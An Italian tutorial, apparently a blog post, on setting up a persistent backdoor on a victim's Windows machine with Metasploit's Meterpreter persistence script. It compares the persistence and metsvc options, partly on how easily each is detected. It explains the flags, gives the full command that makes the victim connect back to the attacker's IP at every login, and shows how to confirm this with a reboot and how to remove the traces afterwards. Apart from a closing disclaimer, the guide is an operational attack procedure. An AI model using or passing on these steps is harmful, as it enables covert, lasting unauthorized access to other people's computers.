Abbiamo gia visto come compromettere il sistema con meterpreter a connessione TCP inversa leggi qui!

Ma il problema più grande è che ad ogni riavvio dovremmo attendere che la nostra vittima avvii nuovamente il nostro file, cosa che accade davvero raramente. Come ovviare a questo problema?

Andiamo a creare la vera e propria backdoor, è utile sapere che metasploit ha 2 opzioni per la nostra backdoor persistente:

  1. Persistence
  2. Metsvc

Il problema della backdoor metsvc è che è molto semplice da rilevare eseguendo un qualsiasi port scanner, anche se di pro ha il fatto che sia meno “rumorosa” della persistence.

Per ragioni ovvie utilizzeremo in questa guida la backdoor persistence.

Avviata la sessione meterpreter digitiamo il comando:

run persistence -h

Ci darà come output le opzioni da utilizzare:

Andiamo a vedere cosa utilizzare per la nostra backdoor:

  • -X (se vogliamo che la nostra vittima stabilisca un collegamento con noi all’avvio)
  • -A (avvierà automaticamente il multi/handler)
  • -L (La destinazione in cui installeremo la nostra backdoor, come espressamente detto dalle opzioni in caso di omissione sceglierà automaticamente la cartella temp)
  • -U (in alternativa a -X)
  • -i (L’intervallo di tempo per ogni tentativo di connessione)
  • -p (porta scelta)
  • -r (il nostro ip)

Dunque eseguiamo il comando:

run persistence -A -U -i 10 -p [porta scelta] -r [vostro ip]

Da adesso la macchina attaccata rimarrà costantemente in ascolto con l’attaccante.

Per avere conferma di quanto detto eseguiamo il comando:

reboot

Attendiamo qualche secondo, si aprirà una nuova sessione con la macchina attaccata!

Nota: Ho utilizzato il comando -L E:\\ per far installare la backdoor sulla mia pennetta (in caso di attacco può essere omesso se ovviamente non avete preferenze particolari)

Una volta sfruttata la vittima se vogliamo eliminare i file creati basta eseguire il comando:

resource [seguito dall'output dato durante la creazione, (dopo la voce resource file for cleanup) /root/.../.../.../file.rc]
ATTENZIONE: QUESTA GUIDA È STATA SCRITTA SOLO A SCOPO DIDATTICO NON MI ASSUMO NESSUNA RESPONSABILITÀ DELLE VOSTRE AZIONI ILLEGALI O DANNI CAUSATI. RICORDO CHE LA VIOLAZIONE DELLA PRIVACY E DANNI CAUSATI TRAMITE MEZZI INFORMATICI, SONO PUNITI PENALMENTE!